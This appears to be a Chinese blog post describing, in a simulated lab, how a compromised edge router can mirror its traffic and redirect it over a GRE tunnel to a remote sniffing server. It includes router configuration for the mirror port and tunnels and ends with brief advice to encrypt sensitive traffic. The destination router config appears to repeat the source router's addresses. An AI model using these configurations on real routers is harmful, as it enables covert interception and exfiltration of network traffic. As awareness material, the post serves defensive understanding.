美文网首页黑客师黑客
路由器流量重定向技术危害及防范说明

路由器流量重定向技术危害及防范说明

作者: 爱看时事的通信崔 | 来源:发表于2019-05-10 10:26 被阅读4次

一般情况下,企业或组织的出口路由器往往部署在防火墙以外,缺乏安全保护,所以很容易失控。而一旦边界路由器被入侵,则很可能被用来进行流量重定向,导致数据失泄密风险。

这篇文档中,我利用模拟器构建了一个实验环境,模拟了某台路由器被入侵后,导致进出网络流量被重定向的情况。

一、实验环境

如图所示,网络A的主机访问目标主机B,由于出口路由器被入侵,导致所有数据被镜像后重定向到目标路由器,并最终被发送到监听服务器。

测试拓扑图

二、配置思路

  1. 首先在出口路由器上设置镜像口,复制指定的、感兴趣的、甚至是所有的进出口流量;
  2. 通过GRE的tunnel隧道技术,在网络层添加一个IP头,从而实现流量想重定向到哪里,就重定向到哪里的目标;
  3. 在目标路由器下,挂接监听服务器。

三、具体配置

第一步:配置镜像口

# 设置远程监听服务器(192.168.3.2)
observe-server destination-ip 192.168.3.2 source-ip 192.168.1.1
# 选择监听端口
interface GigabitEthernet0/0/0
 ip address 192.168.1.1 255.255.255.0 
 mirror to observe-server inbound

第二步:设置Gre隧道

[SrcRouter]
# 10.1.1.1为源路由器隧道IP, 10.1.1.2为目标路由器隧道IP
# 192.168.12.1为源路由器互联口IP,192.168.12.2为目标路由器互联口IP
interface Tunnel0/0/1
 description 192.168.12.2
 ip address 10.1.1.1 255.255.255.0
 tunnel-protocol gre
 source 192.168.12.1
[DstRouter]
interface Tunnel0/0/1
 description 192.168.12.2
 ip address 10.1.1.1 255.255.255.0
 tunnel-protocol gre
 source 192.168.12.1

第三步:那就非常简单了,开启监听服务器的网口混杂模式,Sniff走起吧。

四、结论

一旦数据丢失了,很容易暴露内部网络和数据通联情况。所以网络运维必须高度重视数据安全问题,特别是网络中的重要数据和隐私流量,一定要加密处理。

相关文章

  • 路由器流量重定向技术危害及防范说明

    一般情况下,企业或组织的出口路由器往往部署在防火墙以外,缺乏安全保护,所以很容易失控。而一旦边界路由器被入侵,则很...

  • 吊装作业的危害及防范

    吊装作业 工作危害及防范措施 A交底不清,错误施工,影响安全生产。 ①确明确施工地点、部位、范围;②明确施工项目、...

  • Linux 重定向 Shell 输出

    重定向命令 命令说明command > file输出重定向到文件command < file输入重定向到文件com...

  • 《Linux就该这么学 》笔记(六)| 管道符、重定向和环境变量

    1. 重定向 重定向技术的 5 种模式 标准覆盖输出重定向 标准追加输出重定向 错误覆盖输出重定向 错误追加输出重...

  • 第07章重定向管道

    输出重定向案例 > < 脚本中使用重定向 2.输入重定向及结合案例 管道 | 重定向和管道的符号对比。重定向输出到...

  • 珍惜一生血汗,打击洗钱犯罪,远离非法集资

    本月我行组织员工深入到农贸市场中,进行预防洗钱、防范非法集资的宣传活动。 我行员工积极向群众讲解洗钱的形式、危害及...

  • Linux重定向day13

    1.重定向概述2.重定向的输出输入3.进程管道技术 一、重定向概述 什么是重定向:Linux重定向是指修改原来默认...

  • 防范大数据危害

    上节说到大数据的发展必须会给人类社会造成危害(请见:大数据危害),那么这种危害要怎么防范呢?毕竟大数据的前景实在太...

  • linux管道及重定向

    一 .管道及重定向 I/O重定向 0, 1, and 2, known as standard input, st...

  • 重定向与负载均衡

    前言 重定向技术,它们是如何工作的以及它们的负载均衡能力如何: HTTP 重定向 DNS 重定向 任播路由 IP ...

网友评论

    本文标题:路由器流量重定向技术危害及防范说明

    本文链接:https://www.haomeiwen.com/subject/qxyooqtx.html